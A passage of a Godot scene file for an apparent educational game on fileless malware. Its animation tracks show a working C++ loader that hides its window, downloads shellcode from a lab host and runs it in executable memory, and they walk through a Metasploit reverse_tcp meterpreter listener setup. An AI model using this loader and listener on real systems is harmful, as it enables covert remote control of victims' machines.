"update": 0,
"values": [6.999999999999998]
}

[sub_resource type="Animation" id="Animation_avoq8"]
resource_name = "fileless_10"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 3: BOILERPLATE"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["It reserves executable memory, copies the shellcode into it, and then runs that shellcode like a program.

We are all done here, let's compile this into our terminal to generate our boilerplate.exe"]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["#include <iostream>
#include <cpr/cpr.h>
#include <windows.h>

int main() {
	 ::ShowWindow(::GetConsoleWindow(), SW_HIDE);
	cpr::Response r = cpr::Get(cpr::Url{ \"http://192.168.56.102/home\" });
	char* memBuffer = NULL;
	memBuffer = (char *)r.text.c_str(); 
	
	unsigned char shellcode[382];
	memBuffer += 2; 
	for (size_t count = 0; count < sizeof shellcode - 1; count++) { 
		sscanf_s(memBuffer, \"%02hhx\", &shellcode[count]); 
		memBuffer = memBuffer + 4;
	}

	void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, 
 PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();
}"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(3.7, 1.865), Vector2(3.47, 1.95)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.025, -0.2), Vector2(0.025, 1.91)]
}
tracks/6/type = "value"
tracks/6/imported = false
tracks/6/enabled = true
tracks/6/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:scroll_vertical")
tracks/6/interp = 1
tracks/6/loop_wrap = true
tracks/6/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 0,
"values": [13.999999999999998]
}

[sub_resource type="Animation" id="Animation_7q661"]
resource_name = "fileless_11"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 5: LISTENER"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["Now we need to setup our listener"]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [""]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [false]
}

[sub_resource type="Animation" id="Animation_4xa5g"]
resource_name = "fileless_12"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 5: LISTENER"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["Let's run metasploit using this command"]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["root@DESKTOP-123ABC:~$ msfconsole"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.1, 0.26), Vector2(2.855, 0.32)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.015, -0.06), Vector2(0.015, 0.095)]
}

[sub_resource type="Animation" id="Animation_fisl7"]
resource_name = "fileless_13"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 5: LISTENER"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [" This module doesn’t exploit anything — it just waits (listens) for a payload to connect back. 

 Perfect for catching a reverse_tcp payload you made with msfvenom."]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["root@DESKTOP-123ABC:~$ msfconsole
msf6 > use exploit/multi/handler"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(2.855, 0.32), Vector2(2.5, 0.32)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.015, 0.095), Vector2(0.015, 0.425)]
}

[sub_resource type="Animation" id="Animation_sb7b7"]
resource_name = "fileless_14"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 5: LISTENER"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["Matches the payload type you generated earlier — this is critical.

 If the payload you made in msfvenom is windows/meterpreter/reverse_tcp, this must be the same here"]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["root@DESKTOP-123ABC:~$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(2.5, 0.32), Vector2(3.81, 0.99)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.015, 0.425), Vector2(0.015, 0.725)]
}

[sub_resource type="Animation" id="Animation_jsba4"]
resource_name = "fileless_15"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 5: LISTENER"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["This should be the IP address of your attacking machine on the same network as the target.

Must match the LHOST you used in msfvenom."]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["root@DESKTOP-123ABC:~$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) >  set LHOST 192.168.56.102
LHOST => 192.168.56.102"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(3.81, 0.99), Vector2(2.965, 0.99)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.015, 0.725), Vector2(0.015, 1.645)]
}

[sub_resource type="Animation" id="Animation_72txf"]
resource_name = "fileless_16"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 5: LISTENER"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["Same as above — this needs to match the LPORT from your generated payload."]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["root@DESKTOP-123ABC:~$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) >  set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf6 exploit(multi/handler) >  set LPORT 8000
LPORT => 8000"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(2.965, 0.99), Vector2(3.335, 0.685)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.015, 1.645), Vector2(0.015, 2.585)]
}

[sub_resource type="Animation" id="Animation_35c0o"]
resource_name = "fileless_17"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 5: LISTENER"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["This will display a table of all configurable arguments for the chosen payload"]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["root@DESKTOP-123ABC:~$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) >  set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf6 exploit(multi/handler) >  set LPORT 8000
LPORT => 8000
msf6 exploit(multi/handler) > show options"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(3.335, 0.685), Vector2(3.2, 0.425)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.015, 2.585), Vector2(0.015, 3.205)]
}

[sub_resource type="Animation" id="Animation_fwrof"]
resource_name = "fileless_18"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 5: LISTENER"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["Seems everything is right, let's try to run our listener and get ready for our next step"]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["root@DESKTOP-123ABC:~$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) >  set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf6 exploit(multi/handler) >  set LPORT 8000
LPORT => 8000
msf6 exploit(multi/handler) > show options
Payload options (windows/meterpreter/reverse_tcp)

Name         Current Setting      Required       Description

EXITFUNC  process   yes         Exit technique (Accepted: ' ', seh, thr, ead, process, none)

LHOST       192.168.29.208         yes         The listen address (an interface maybe specified)

LPORT       8000                           yes         The listen port 
"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(3.2, 0.425), Vector2(3.975, 4.07)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.015, 3.205), Vector2(0.015, -0.045)]
}
tracks/6/type = "value"
tracks/6/imported = false
tracks/6/enabled = true
tracks/6/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:scroll_vertical")
tracks/6/interp = 1
tracks/6/loop_wrap = true
tracks/6/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 0,
"values": [12.999999999999998]
}

[sub_resource type="AnimationLibrary" id="AnimationLibrary_de0th"]
_data = {
&"fileless_1": SubResource("Animation_q0tlf"),
&"fileless_10": SubResource("Animation_avoq8"),
&"fileless_11": SubResource("Animation_7q661"),
&"fileless_12": SubResource("Animation_4xa5g"),
&"fileless_13": SubResource("Animation_fisl7"),
&"fileless_14": SubResource("Animation_sb7b7"),
&"fileless_15": SubResource("Animation_jsba4"),
&"fileless_16": SubResource("Animation_72txf"),
&"fileless_17": SubResource("Animation_35c0o"),
&"fileless_18": SubResource("Animation_fwrof"),
&"fileless_2": SubResource("Animation_yvlyr"),
&"fileless_3": SubResource("Animation_rvh2y"),
&"fileless_4": SubResource("Animation_krri1"),
&"fileless_5": SubResource("Animation_e02ds"),
&"fileless_6": SubResource("Animation_33oqg"),
&"fileless_7": SubResource("Animation_pwtf5"),
&"fileless_8": SubResource("Animation_i1bj2"),
&"fileless_9": SubResource("Animation_nteir")
}

[sub_resource type="StyleBoxFlat" id="StyleBoxFlat_h8m8q"]
bg_color = Color(0.11764706, 0.11764706, 0.1882353, 1)
corner_radius_top_left = 10
corner_radius_top_right = 10
corner_radius_bottom_right = 10
corner_radius_bottom_left = 10

[sub_resource type="StyleBoxFlat" id="StyleBoxFlat_pkbn6"]
content_margin_left = 5.0
content_margin_right = 5.0
bg_color = Color(0.2303367, 0.44994062, 0.80007863, 1)

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_cxtjw"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_wf7ls"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_vuf0p"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_31cwg"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_x5n46"]

[node name="CodeEditor" type="Control"]
layout_mode = 3
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
grow_horizontal = 2
grow_vertical = 2
script = ExtResource("1_q0tlf")

[node name="Background" type="ColorRect" parent="."]
layout_mode = 1
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
grow_horizontal = 2
grow_vertical = 2
color = Color(0.18985915, 0.23259696, 0.31803992, 1)
metadata/_edit_use_anchors_ = true

[node name="Header" type="PanelContainer" parent="."]
layout_mode = 1
anchors_preset = -1
anchor_right = 1.0
anchor_bottom = 0.074074075
grow_horizontal = 2
theme_override_styles/panel = SubResource("StyleBoxFlat_t4n35")
metadata/_edit_use_anchors_ = true

[node name="Label" type="Label" parent="Header"]
layout_mode = 2
theme_override_fonts/font = ExtResource("2_qxdw1")
text = "VScode"

[node name="Body" type="HBoxContainer" parent="."]
layout_mode = 1
anchors_preset = -1
anchor_left = 0.006076389
anchor_top = 0.094135806
anchor_right = 0.9939236
anchor_bottom = 0.970679
grow_horizontal = 2
grow_vertical = 2
theme_override_constants/separation = 14
alignment = 1
metadata/_edit_use_anchors_ = true

[node name="ExplanationPanel" type="PanelContainer" parent="Body"]
clip_children = 2
clip_contents = true
custom_minimum_size = Vector2(370, 500)
layout_mode = 2
size_flags_horizontal = 3
theme_override_styles/panel = SubResource("StyleBoxFlat_qmx2e")

[node name="VBoxContainer" type="VBoxContainer" parent="Body/ExplanationPanel"]
layout_mode = 2

[node name="FoldableContainer" type="FoldableContainer" parent="Body/ExplanationPanel/VBoxContainer"]
layout_mode = 2
theme = SubResource("Theme_x5n46")
title = "⚠️FILELESS MALWARE⚠️"

[node name="RichTextLabel" type="RichTextLabel" parent="Body/ExplanationPanel/VBoxContainer/FoldableContainer"]
custom_minimum_size = Vector2(0, 531.305)
layout_mode = 2
bbcode_enabled = true
text = "Fileless malware is a stealthy type of malicious software. Instead of installing a file on your computer, it runs entirely in memory using trusted system tools. This makes it hard to detect and allows attackers to steal data or control your computer without leaving obvious traces.."

[node name="CodeContainer" type="VBoxContainer" parent="Body"]
layout_mode = 2
size_flags_horizontal = 6

[node name="PanelContainer" type="PanelContainer" parent="Body/CodeContainer"]
clip_children = 2
clip_contents = true
custom_minimum_size = Vector2(733.03, 500)
layout_mode = 2
size_flags_horizontal = 4
theme_override_styles/panel = SubResource("StyleBoxFlat_0dqkl")

[node name="MarginContainer" type="MarginContainer" parent="Body/CodeContainer/PanelContainer"]
layout_mode = 2
theme_override_constants/margin_left = 20
theme_override_constants/margin_top = 10
theme_override_constants/margin_right = 5
theme_override_constants/margin_bottom = 5

[node name="CodeEdit" type="CodeEdit" parent="Body/CodeContainer/PanelContainer/MarginContainer"]
layout_mode = 2
theme_override_font_sizes/font_size = 25
theme_override_styles/normal = SubResource("StyleBoxEmpty_qmx2e")
theme_override_styles/focus = SubResource("StyleBoxEmpty_0tp54")
theme_override_styles/read_only = SubResource("StyleBoxEmpty_h8m8q")
theme_override_styles/completion = SubResource("StyleBoxEmpty_pkbn6")
wrap_mode = 1
autowrap_mode = 2
gutters_draw_line_numbers = true

[node name="Overlay" type="ColorRect" parent="Body/CodeContainer/PanelContainer"]
visible = false
material = SubResource("ShaderMaterial_gu46y")
layout_mode = 2
mouse_filter = 2
metadata/_edit_use_anchors_ = true

[node name="RichTextLabel" type="RichTextLabel" parent="Body/CodeContainer"]
visible = false
custom_minimum_size = Vector2(0, 70)
layout_mode = 2
theme_override_fonts/normal_font = ExtResource("3_oducy")
theme_override_font_sizes/normal_font_size = 20
bbcode_enabled = true
text = "[wave]This is my text"

[node name="AnimationPlayer" type="AnimationPlayer" parent="."]
libraries = {
&"": SubResource("AnimationLibrary_de0th")
}

[node name="WindowBackground" type="ColorRect" parent="."]
process_mode = 3
visible = false
layout_mode = 1
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
grow_horizontal = 2
grow_vertical = 2
mouse_filter = 2
color = Color(0, 0, 0, 0.17254902)
script = ExtResource("4_dsue1")

[node name="Window" type="PanelContainer" parent="WindowBackground"]
clip_children = 2
layout_mode = 1
anchors_preset = 8
anchor_left = 0.5
anchor_top = 0.5
anchor_right = 0.5
anchor_bottom = 0.5
offset_left = -210.0
offset_top = -105.0
offset_right = 210.0
offset_bottom = 105.0
grow_horizontal = 2
grow_vertical = 2
